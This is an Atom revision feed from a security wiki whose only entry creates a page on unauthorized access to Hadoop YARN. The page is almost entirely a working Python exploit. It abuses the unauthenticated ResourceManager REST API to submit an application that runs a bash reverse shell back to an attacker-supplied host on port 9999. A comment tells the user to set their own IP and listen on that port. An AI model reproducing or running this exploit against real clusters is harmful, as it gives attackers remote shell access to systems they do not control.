<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Hadoop_%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E</id>
	<title>Hadoop 未授權訪問漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Hadoop_%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Hadoop_%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T05:21:50Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Hadoop_%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E&amp;diff=1557&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python  import requests  target = 'http://x.x.x.x:8088/' lhost = 'x.x.x.x' #把本地主機ip放在這裡，在9999端口監聽(使用時刪除註...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Hadoop_%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8F%E6%BC%8F%E6%B4%9E&amp;diff=1557&amp;oldid=prev"/>
		<updated>2021-04-12T07:58:41Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python  import requests  target = &amp;#039;http://x.x.x.x:8088/&amp;#039; lhost = &amp;#039;x.x.x.x&amp;#039; #把本地主機ip放在這裡，在9999端口監聽(使用時刪除註...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
&lt;br /&gt;
target = 'http://x.x.x.x:8088/'&lt;br /&gt;
lhost = 'x.x.x.x' #把本地主機ip放在這裡，在9999端口監聽(使用時刪除註釋)&lt;br /&gt;
&lt;br /&gt;
url = target + 'ws/v1/cluster/apps/new-application'&lt;br /&gt;
resp = requests.post(url)&lt;br /&gt;
app_id = resp.json()['application-id']&lt;br /&gt;
url = target + 'ws/v1/cluster/apps'&lt;br /&gt;
data = {&lt;br /&gt;
    'application-id': app_id,&lt;br /&gt;
    'application-name': 'get-shell',&lt;br /&gt;
    'am-container-spec': {&lt;br /&gt;
        'commands': {&lt;br /&gt;
            'command': '/bin/bash -i &amp;gt;&amp;amp; /dev/tcp/%s/9999 0&amp;gt;&amp;amp;1' % lhost,&lt;br /&gt;
        },&lt;br /&gt;
    },&lt;br /&gt;
    'application-type': 'YARN',&lt;br /&gt;
}&lt;br /&gt;
requests.post(url, json=data)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>